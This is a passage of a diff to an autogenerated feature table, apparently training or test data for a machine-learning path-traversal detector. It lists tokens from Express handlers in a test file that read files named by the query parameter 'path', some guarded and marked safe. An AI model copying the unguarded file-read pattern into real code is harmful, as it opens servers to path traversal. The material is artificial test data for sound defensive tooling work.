SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | | autogenerated/TaintedPath/normalizedPaths.js:328:35:328:38 | SAFE | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:328:35:328:38 | SAFE | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:329:3:329:33 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:329:6:329:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:329:6:329:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:329:6:329:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:329:6:329:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:329:6:329:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | calleeImports | fs | @@ -9438,6 +78146,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:329:19:329:32 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:332:3:332:33 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:332:6:332:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:332:6:332:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:332:6:332:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:332:6:332:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:332:6:332:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | calleeImports | fs | @@ -9447,6 +78180,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:332:19:332:32 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:338:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:1:350:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:5:338:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:5:338:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:5:338:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | calleeImports | express | @@ -9454,6 +78202,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:338:9:338:29 | '/yet-a ... prefix' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:338:31 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -9461,11 +78224,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:32:350:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:33:338:35 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:338:38:338:40 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:338:38:338:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:338:38:338:40 | res | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:338:38:338:40 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:338:38:338:40 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:9 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:9 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:9 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:9 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:9 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path = ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:22 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:22 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:22 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:22 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:22 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:30 | pathModule.resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:30 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:30 | pathModule.resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:30 | pathModule.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:30 | pathModule.resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:24:339:30 | resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:24:339:30 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:24:339:30 | resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:24:339:30 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:24:339:30 | resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:34 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:34 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:34 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:40 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:40 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:40 | req.query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:40 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:339:32:339:40 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | calleeImports | path | @@ -9475,6 +78308,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:339:32:339:45 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:339:36:339:40 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:339:36:339:40 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:339:36:339:40 | query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path abs pathModule resolve path abs indexOf root 0 fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:339:36:339:40 